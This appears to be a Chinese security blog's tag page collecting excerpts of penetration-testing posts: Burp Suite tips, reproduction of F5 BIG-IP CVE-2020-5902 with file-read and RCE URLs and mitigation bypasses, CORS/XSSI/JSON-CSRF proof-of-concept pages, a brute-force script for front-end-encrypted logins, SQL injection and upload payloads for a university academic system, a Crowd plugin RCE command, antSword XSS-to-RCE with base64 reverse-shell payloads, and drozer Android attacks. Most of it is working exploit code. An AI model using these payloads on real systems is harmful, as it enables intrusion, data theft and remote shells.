Tag:渗透测试

Tag (渗透测试)'s result:

burpsuite使用技巧

1.限制目标scope   2.流量筛选 还有site map – 选中目标 – 右键 – add to scope / intercept – 右键 – don’t intercept this request – to this host   3.快捷键   4.解决中文乱码 选中文字体+选网页编码   5.intruder匹配中文 正则匹配 – 中文转换成十六进制   6.token刷新 录制宏   7.设置代理链   8.设置证书 or or

F5 BIG-IP TMUI RCE漏洞(CVE-2020-5902)重现及注意点

//本文首发先知社区:https://xz.aliyun.com/t/8007 0x00 概述 20200706,网上曝出F5 BIG-IP TMUI RCE漏洞。 F5 BIG-IP的TMUI组件(流量管理用户界面)存在认证绕过漏洞,该漏洞在于Tomcat解析的URL与request.getPathInfo()存在差异,导致可绕过权限验证,未授权访问TMUI模块所有功能,进而可以读取/写入任意文件,命令执行等。   0x01 影响范围 BIG-IP 15.x: 15.1.0/15.0.0 BIG-IP 14.x: 14.1.0 ~ 14.1.2 BIG-IP 13.x: 13.1.0 ~ 13.1.3 BIG-IP 12.x: 12.1.0 ~ 12.1.5 BIG-IP 11.x: 11.6.1 ~ 11.6.5 搜索关键词: shodan http.favicon.hash:-335242539 http.title:”BIG-IP&reg;- Redirect” fofa title=”BIG-IP&reg;- Redirect” tmui censys 443.https.get.body_sha256:5d78eb6fa93b995f9a39f90b6fb32f016e80dbcda8eb71a17994678692585ee5 443.https.get.title:”BIG-IP&reg;- Redirect” google inurl:”tmui/login.jsp” intitle:”BIG-IP” inurl:”tmu   0x02 漏洞重现 TMUI网站目录:/usr/local/www/tmui/ TMUI web server:Tomcat 0. 使用POC检测 https://1.2.3.4/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=test5902 https://1.2.3.4/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp 1. 任意文件读取 https://1.2.3.4/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd 2. 任意文件写入 https://1.2.3.4/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp         3. 列认证用户 https://1.2.3.4/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user   4. 列目录 https://1.2.3.4/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/ 据David Vieira-Kurz(@secalert)说/tmp/下的sess_xxxxxxxxx文件可以替换cookie登录,但是试了几个都失败,可能是过期了……   5. RCE 1)tmshCmd.jsp?command=create+cli+alias+private+list+command+bash 2)fileSave.jsp?fileName=/tmp/cmd&content=id 3)tmshCmd.jsp?command=list+/tmp/cmd 4)tmshCmd.jsp?command=delete+cli+alias+private+list 多发送几次就能rce,基本都是root 记得还原   0x03 有缺陷的缓解方案1 1) 登录TMOS Shell(tmsh): tmsh 2) 编辑httpd组件配置文件 edit /sys httpd all-properties 3) 添加include代码 include ‘ <LocationMatch “.*\.\.;.*”> Redirect 404 / </LocationMatch> ‘ 4) 保存配置文件 ESC 并:wq 5) 保存系统配置 save /sys config 6) 重启httpd服务 restart sys service httpd   0x04 缓解方案绕过1 有缺陷的缓解方案正则限制了..; 但是/hsqldb这个接口加上;(分号)就可以绕过登录认证,进而反序列化,导致RCE 接着利用工具进行反序列化rce https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902 挺鸡肋的,需要知道hsqldb密码,默认空 试过了几个都是socket creation error……   0x05 有缺陷的缓解方案2 include ‘ <LocationMatch “;”> Redirect 404 / </LocationMatch> ‘   0x06 缓解方案绕过2 虽然直接限制分号,但是可以用/hsqldb%0a绕过认证   0x07 防御方案 Command line tmsh edit /sys httpd all-properties Locate the line……

XSSI/JSONP/flash/CORS跨域漏洞总结

0x00 同源策略(SOP)和跨域 SOP: URL Result Reason http://store.company.com/dir2/other.html Success – http://store.company.com/dir/inner/another.html Success – https://store.company.com/secure.html Failure Different protocol http://store.company.com:81/dir/etc.html Failure Different port http://news.company.com/dir/other.html Failure Different host <script>允许跨域加载资源 所有带src或href属性的标签以及部分其他标签可以跨域: <script src=”…”></script> <img src=”…”> <video src=”…”></video> <audio src=”…”></audio> <embed src=”…”> <frame src=”…”> <iframe src=”…”></iframe> <link rel=”stylesheet” href=”…”> <applet code=”…”></applet> <object data=”…” ></object> @font-face可以引入跨域字体。 <style type=”text/css”> @font-face { src: url(“http://developer.mozilla.org/@api/deki/files/2934/=VeraSeBd.ttf”); } </style> SOP和CORS,都是浏览器阻止了响应,而非拦截请求。   0x01 XSSI Cross-Site Scrite Inclusion 传统的XSSI攻击场景:恶意页面B使用script标签包含了目标网站A用来储存敏感数据的信息源C(可能是动态脚本、文件或响应),当攻击者引导受害者访问B时,由于受害者此时在A处于登录态,B可以轻松获取C中包含的受害者的敏感信息。 0. 静态的JavaScript(常规XSSI) <html> <head> <title>Regular XSSI</title> <script src=”https://www.vulnerable-domain.tld/script.js”></script> </head> <body> <script> alert(JSON.stringify(keys[0])); </script> </body> </html> //直接访问该js即可获取敏感信息,但一般都是攻击认证后包含敏感信息的js 1. 动态JavaScript 利用网上的代码作为例子:敏感数据在局部变量,通过重写函数窃取 (function(){ var token = getToken(); doSomeThing(token); })(); function getToken(){ len = 16 || 32; var $chars = ‘ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz012345678’; var maxPos = $chars.length; var pwd = ”; for (i = 0; i < len; i++) { pwd += $chars.charAt(Math.floor(Math.random() * maxPos)); } return pwd; } 重写doSomeThing() <!–恶意页面–> <html> <head> <title>XSSI Attack</title> <script type=”text/javascript”> window.data = ”; function doSomeThing(d){ window.data = d; } </script> </head> <body> <h2>XSSI Attack</h2> <p id=”leaked_content”></p> <script type=”text/javascript” src=”http://192.168.10.130:81/secret.js”></script> <script type=”text/javascript” src=”jquery-3.3.1″></script> <script type=”text/javascript”> $(‘#leaked_content’).text(window.data); </script> </body> </html> 更多全局变量/函数/功能参数/原型链的情况可以参考:https://www.mi1k7ea.com/2020/01/04/浅析XSSI漏洞/ 2. 非JavaScript ie bug(<10): 为了防止js错误信息跨域泄漏,对于外部加载的js文件,现在主流的浏览器只有固定的错误信息,比如“script error”,但是在ie9与ie10,情况不一定如此。……

CORS进阶利用

//结合网络资料整理了CORS的进阶利用方式,基础利用参考浅谈sop、cors和csp   SOP可以发请求,但是浏览器会阻止响应 当”Access-Control-Allow-Origin“是动态产生,要用”Vary: Origin“指定。 这个头部字段向客户端表明,服务器端返回内容的将根据请求中”Origin“的值而变化。   1. ACAO为* Access-Control-Allow-Origin:* 注意Access-Control-Allow-Credentials:true和Access-Control-Allow-Origin:*不能同时使用!!! 这样配置浏览器将会报错 直接利用即可   2. ACAO为requester.com 后端代码例子: if ($_SERVER[‘HTTP_HOST’] == ‘*requester.com’) { //Access data else{ // unauthorized access} } 申请一个以requester.com结尾的域名放poc即可 or ^https?:\/\/.*\.?target\.local$ Origin: https://nottarget.local or Origin: https://target.local.attacker.domain   3. 白名单域名 if ($_SERVER[‘HTTP_HOST’] == ‘*.requester.com’) { //Access data else{ // unauthorized access} } 利用sub.requester.com的xss(或者子域名接管漏洞)漏洞攻击provider.com 案例: https://banques.redacted.com/choice-quiz?form_banque=”><script>function%20cors(){var%20xhttp=new%20XMLHttpRequest();xhttp.onreadystatechange=function(){if(this.status==200) alert(this.responseText);document.getElementById(“demo”).innerHTML=this.responseText}};xhttp.open(“GET”,”https://www.redacted.com/api/return”,true);xhttp.withCredentials=true;xhttp.send()}cors();</script>&form_cartes=73&iframestat=1   4. 反射origin add_header “Access-Control-Allow-Origin” $http_origin; add_header “Access-Control-Allow-Credentials” “true”;   5. 信任null Access-Control-Allow-Origin: null Access-Control-Allow-Credentials: true <iframe sandbox=”allow-scripts allow-top-navigation allow-forms” src=’data:text/html,<script>**CORS request here**</script>’></iframe>   5. 特殊字符 浏览器在发出请求之前并不总是验证域名。 因此,如果使用某些特殊字符,则浏览器当前可能会提交请求,而无需事先验证域名是否有效和存在。   特殊字符 Chrome(v 67.0.3396) Edge(v 41.16299.371) Firefox(v 61.0.1) Internet Explorer(v 11) Safari(v 11.1.1) ! NO NO NO NO YES = NO NO NO NO YES $ NO NO YES NO YES & NO NO NO NO YES ‘ NO NO NO NO YES ( NO NO NO NO YES ) NO NO NO NO YES * NO NO NO NO YES + NO NO YES NO YES , NO NO NO NO YES – YES NO YES YES YES ; NO NO NO NO YES = NO NO NO……

JSON型CSRF攻击方法

原始请求,存在CSRF漏洞 如果后端只是检查格式不检查header,可尝试 <html> <body> <script src=”jquery.min.js”></script> <form id=”myform” enctype=”text/plain” action=”https://xxx.com/apps/member/up_member_info” method=”POST”> <input id=”json” type=”hidden” name=’json’ value=’changenick”}’> </form> <script> $(document).ready(function() { $(“#json”).attr(“name”,'{“name”:”‘); $(“#myform”).submit(); }); </script> </body> </html> 增加ignore_me参数可去掉多出的等号: <form action=”https://xxxx.com/apps/member/up_member_info” method=”post” enctype=”text/plain”> <p>Last name: <input type=”text” name='{“name”:”changenick6″,”ignore_me”:”‘ value=’test”}’type=’hidden’></p> <input type=”submit” value=”Submit” /> </form> 或者把value置空: <html> <body> <script src=”jquery.min.js”></script> <form id=”myform” enctype=”text/plain” action=”https://xxx.com/apps/member/up_member_info” method=”POST”> <input id=”json” type=”hidden” name=’json’ value=”> </form> <script> $(document).ready(function() { $(“#json”).attr(“name”,'{“name”:”changenick”}’); $(“#myform”).submit(); }); </script> </body> </html> 利用fetch发请求: <html> <title>JSON CSRF POC</title> <body> <center> <h1> JSON CSRF POC </h1> <script> fetch(‘https://xxx.com/apps/member/up_member_info’;, {method: ‘POST’, credentials: ‘include’, headers: {‘Content-Type’: ‘text/plain’}, body: ‘{“username”:”test0001″}’}); </script> <form action=”#”> <input type=”button” value=”Submit” /> </form> </center> </body> </html>   利用xmlhttprequest发请求,要配合跨域漏洞 <html> <script language=”javascript” type=”text/javascript”> function jsonreq() { var xmlhttp = new XMLHttpRequest(); xmlhttp.open(“POST”,”https://xxx.com/apps/member/up_member_info”,true); xmlhttp.setRequestHeader(“Content-Type”,”application/json;charset=UTF-8″); xmlhttp.withCredentials = true xmlhttp.send(JSON.stringify({“name”:”changenick02″}));; } jsonreq(); </script> </html>       如果后端检查了header,尝试flash+307 Flash可以携带请求头和请求参数向重定向器(307)发出请求。 重定向器向目标页面发出CSRF攻击请求(携带请求头和请求参数,X-Requested-With:flash)。 Flash再向目标站请求crossdomain.xml,但是此前攻击请求已发出。 准备道具: 服务器,恶意flash文件,307页面文件,crossdomain.xml(可选) crossdomain.xml: <cross-domain-policy> <allow-access-from domain=”*” secure=”false”/> <allow-http-request-headers-from domain=”*” headers=”*” secure=”false”/> </cross-domain-policy> 用来允许flash向攻击者服务器请求307页面。 //如果flash文件和307页面在同一个域名下,就不需要crossdomain文件 重定向307的PHP文件: <?php // redirect automatically header(“Location: https://victim.com/user/endpoint/”;, true, 307); ?>   实战案例: 环境:win7+Chrome79.0.3945.79+flash32.0.0.303 没有csrf防御,但是为json格式 先利用普通的form响应500,表明后端可能检验了content-type头。 尝试使用xhr 发option预检请求 意料之内无法通过(除非有xss配合,xsrf!)   构造钓鱼页面(利用embed加载flash): <html> <head></head> <body> <embed height=”600″……

突破前端加密方法总结

0x00 执行加密的js文件写脚本生成加密字典 如 https://yyy.xxx.com/assets/des/des.js 对密码(123456)进行了前端加密传输。 这里还需要从页面源代码找到加密方法的参数 pip install PyExecJS 再安装PhantomJS(可选),或者用默认的js解析引擎也行。(execjs.get().name) 加密脚本:生成加密后的用户名和密码 #coding:utf-8 #from selenium import webdriver import execjs def mzDes(s,para): despara = execjs.get(‘phantomjs’).compile(s).call(“strEnc”,para,”csc”,”mz”,”2017″) return despara with open(‘des.js’,’r’) as mzCrypto: s = mzCrypto.read() with open(‘users.txt’,’r’) as users: #des username     with open(‘des_users.txt’,’w’) as f4DesUser:     user = users.readlines()     for u in user:     uname = u.strip()     print uname desUsername = mzDes(s,uname) print desUsername     f4DesUser.write(desUsername+’\n’) with open(‘pwdTop54.txt’,’r’) as pwds: #des password     with open(‘des_pwds.txt’,’w’) as f4DesPwd:     pwd = pwds.readlines()     for p in pwd:     passwd = p.strip()     print passwd     desPassword = mzDes(s,passwd)     print desPassword     f4DesPwd.write(desPassword+’\n’) 这样就可以利用burpsuite/python脚本加载加密后的字典愉快的爆破啦。 py脚本爆破(单线程): #coding:utf-8 #from selenium import webdriver import execjs import requests import re successCount = 0 def mzDes(s,para): despara = execjs.get().compile(s).call(“strEnc”,para,”csc”,”mz”,”2017″) return despara with open(‘des.js’,’r’) as mzCrypto: s = mzCrypto.read() with open(‘users.txt’,’r’) as users: #des username user = users.readlines() for u in user: with open(‘top50.txt’,’r’) as pwds: #des password     uname = u.strip()……

URP教务系统历史漏洞集合

主要参考wooyun 账号密码构成 教师 21071 21071 21072 21072   学生 2016517109 2016517109 2016046126 201604612 账号和密码相同,或密码身份证后6位或123456   1. SQL注入 <html> <form action=”http://xxx.edu.cn/servlet/com.runqian.report.input.UploadFile2DBServlet” method=”post” enctype=”multipart/form-data”> <label for=”file”>Filename:</label> <input type=”file” name=”file” id=”file” /> cachedId:<input type=”text” name=”update” value=”tbl=dual;keyValue=2;keyCol=1;updateValue=1;updateCol=1″> srcType:<input type=”text” name=”xh” value=”test”> <input type=”text” name=”processor” value=”com.runqian.report.input.AbstractProcessor”> <input type=”text” name=”backAndRefresh” value=”test”> <input type=”text” name=”webTableName” value=”test11″> <input type=”text” name=”importTo” value=”text”> <input type=”text” name=”params” value=”params”> <br /> <input type=”submit” name=”submit” value=”Submit” /> </form> </html> 随便上传一个文件,上传时抓包 update填tbl=dual;keyValue=2;keyCol=1;updateValue=1;updateCol=1 此时是因为keyCol=1,1这个列索引不存在 此处直接在tbl处注入,把后面的东西注释掉就好了 因为开启了oracle报错。 那就简单了。 报错注入下 以爆数据库名为例 update内容为 tbl=dual/**/where/**/1=to_char(dbms_xmlgen.getxml(‘select “‘||(select user from sys.dual)||’” from sys.dual’))–;keyValue=1;keyCol=1;updateValue=1;updateCol=1; 然后注入出一条数据为例 udpate内容为 tbl=dual/**/where/**/1=to_char(dbms_xmlgen.getxml(‘select “‘||(select xh||’#’||xm||’#’||xb from xs_xjb where rownum=1)||’” from sys.dual’))–;keyValue=1;keyCol=1;updateValue=1;updateCol=1;   2. 越权 1) 需登录 http://ip/jmglAction.do?oper=xsmdcx http://ip/gradeLnAllAction.do?type=ln&oper=qb&cjbh=学号   2) /cmenu/menu.jsp   访问后 reportIndex.jsp /index/tree.jsp /reportIndex.jsp 越权获取信息   3) 登录 fileUploadDownloadAction.do?actionType=1 越权删除他人文件改id 文件名xss   4) 登录 reportAction.do   5) 登录 /reportFiles/cj/cj_zwcjd.jsp   3. 任意文件上传 <form action=”http://x.x.x.x/lwUpLoad_action.jsp” method=”post” enctype=”multipart/form-data” > <input type=”file” name=”theFile” id=”File”/> <input type=”text” name=”xh” id=”context”/> <input type=”submit” value=”show me the shell” > </form>   4. 任意文件读取 com.runqian.report.view.html.GraphServlet?picFile=../../../../../../../../conf/resin.conf http://x.x.x.x/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../conf/resin.conf

Atlassian Crowd and Crowd Data Center RCE 漏洞重现(CVE-2019-11580)

201907,网上爆出Atlassian Crowd and Crowd Data Center RCE 漏洞,重现一下。     curl -k -H “Content-Type: multipart/mixed” \ –form “file_cdl=@rce.jar” http://10.10.20.166:8095/crowd/admin/uploadplugin.action Installed plugin /opt/atlassian/crowd/apache-tomcat/temp/plugindev-1059463178748466378rce.jar https://github.com/jas502n/CVE-2019-11580  

antsword xss漏洞重现

0x00 概述 20190412,antsword的github上有个issus https://github.com/AntSwordProject/antSword/issues/147 因为toastr错误信息以html返回并且没有严格过滤导致xss,新版本修复不支持html。 比较有趣,重现一下   0x01 漏洞重现 环境:win7+phpstudy(php5.6.27-nts)+perl+nc+antsword2.0.5 1) XSS xss webshell: <?php header(‘HTTP/1.1 500 <img src=# onerror=alert`x`>’);   2) RCE win+nodejs 成功反弹shell。 var net = require(“net”), sh = require(“child_process”).exec(“cmd.exe”); var client = new net.Socket(); client.connect(6677, “127.0.0.1”, function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); <?php header(“HTTP/1.1 500 Not <img src=# onerror=’eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCg2Njc3LCAiMTI3LjAuMC4xIiwgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTsKc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=`,`base64`).toString())’>”); ?>   未成功的组合: win+perl perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:443″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’ # Win 平台 perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’ <?php header(“HTTP/1.1 406 Not <img src=# onerror=’eval(new Buffer(`cmVxdWlyZSgmIzM5O2NoaWxkX3Byb2Nlc3MmIzM5OykuZXhlYygmIzM5O3BlcmwgLU1JTyAtZSBcJiMzOTskYz1uZXcgSU86OlNvY2tldDo6SU5FVChQZWVyQWRkciwiMTI3LjAuMC4xOjY2NzciKTtTVERJTi0mZ3Q7ZmRvcGVuKCRjLHIpOyR+LSZndDtmZG9wZW4oJGMsdyk7c3lzdGVtJF8gd2hpbGUmbHQ7Jmd0OztcJiMzOTsmIzM5OywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0mZ3Q7ew0KICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOw0KICB9KTs=`,`base64`).toString())’>”); ?> require(‘child_process’).exec(‘perl -MIO -e \’$c=new IO::Socket::INET(PeerAddr,”127.0.0.1:6677″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\”,(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); }); Linux+perl 反弹 未测试 require(‘child_process’).exec(‘perl -e \’use Socket;$i=”127.0.0.1″;$p=6677;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/bash -i”);};\”,(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); }); <?php header(“HTTP/1.1 406 Not <img src=# onerror=’eval(new Buffer(`cmVxdWlyZSgmIzM5O2NoaWxkX3Byb2Nlc3MmIzM5OykuZXhlYygmIzM5O3BlcmwgLWUgXCYjMzk7dXNlIFNvY2tldDskaT0iMTI3LjAuMC4xIjskcD02Njc3O3NvY2tldChTLFBGX0lORVQsU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoInRjcCIpKTtpZihjb25uZWN0KFMsc29ja2FkZHJfaW4oJHAsaW5ldF9hdG9uKCRpKSkpKXtvcGVuKFNURElOLCImZ3Q7JlMiKTtvcGVuKFNURE9VVCwiJmd0OyZTIik7b3BlbihTVERFUlIsIiZndDsmUyIpO2V4ZWMoIi9iaW4vYmFzaCAtaSIpO307XCYjMzk7JiMzOTssKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9Jmd0O3sNCiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsNCiAgfSk7`,`base64`).toString())’>”); ?> Linux+nodejs 未测试 var net = require(“net”), sh = require(“child_process”).exec(“/bin/bash”);var client = new net.Socket(); client.connect(6677, “127.0.0.1”, function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); <?php header(“HTTP/1.1 500 Not <img src=# onerror=’eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCIvYmluL2Jhc2giKTt2YXIgY2xpZW50ID0gbmV3IG5ldC5Tb2NrZXQoKTsNCmNsaWVudC5jb25uZWN0KDY2NzcsICIxMjcuMC4wLjEiLCBmdW5jdGlvbigpe2NsaWVudC5waXBlKHNoLnN0ZGluKTtzaC5zdGRvdXQucGlwZShjbGllbnQpOw0Kc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=`,`base64`).toString())’>”); ?> var Process = window.parent.top.process.binding(‘process_wrap’).Process;var proc = new Process(); proc.onexit = function (a, b) {};var env = window.parent.top.process.env;var env_ = [];for (var key in env) env_.push(key + ‘=’ + env[key]); proc.spawn({ file: ‘cmd.exe’, args: [‘/k……

利用drozer测试安卓四大组件

0x00 安装drozer windows: 在github下载msi安装文件执行,装在local disk python27下。 pip install protobuf pyOpenSSL Twisted service_identity 下载drozer agent https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk adb.exe install drozer-agent.apk adb.exe install test.apk 开启drozer-agent enable adb forward tcp:31415 tcp:31415 cd C:\python27\scripts: drozer console connect      0x01 Activity PWList的activity设置为了true,有被导出风险。 未授权访问 dz> run app.activity.start –component com.mwr.example.sieve com.mwr.example.sieve.PWList   0x02 Broadcast receiver的exported未设置,可被利用。   发送恶意广播 run app.broadcast.send –action org.owasp.goatdroid.fourgoats.SOCIAL_SMS –extra string phoneNumber 1234 –extra string message pwnd dos造成崩溃 run app.broadcast.send –action org.owasp.goatdroid.fourgoats.SOCIAL_SMS     0x03 Service 没设置exported为false,默认可以导出。 启动GPS位置服务。 run app.service.start –action org.owasp.goatdroid.fourgoats.services.LocationService –component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.services.LocationService     0x04 Content 列出可访问内容URI的列表和路径: SQL注入:   0x05 相关命令 run scanner.provider.finduris -a com.mwr.example.sieve run app.service.info -a org.owasp.goatdroid.fourgoats run app.service.start –action org.owasp.goatdroid.fourgoats.services.LocationService –component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.services.LocationService run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ –projection “* FROM SQLITE_MASTER WHERE type=’table’;–” run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ –projection “* FROM Key;–” run scanner.provider.injection -a com.mwr.example.sieve run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data run app.provider.info -a com.mwr.example.sieve run app.service.send com.mwr.example.sievecom.mwr.example.sieve.AuthService –msg 2354 9234 0 –extra stringcom.mwr.example.sieve.PIN 1234 –bundle-as-obj run app.provider.querycontent://com.mwr.example.sieve.DBContentProvider/Keys/  –projection “* from Passwords;–” run scanner.provider.traversal -a com.mwr.example.sieve   0x06 参考资料 https://www.freebuf.com/column/175218.html https://www.freebuf.com/articles/web/165466.html https://www.jianshu.com/p/dfa92bab3a55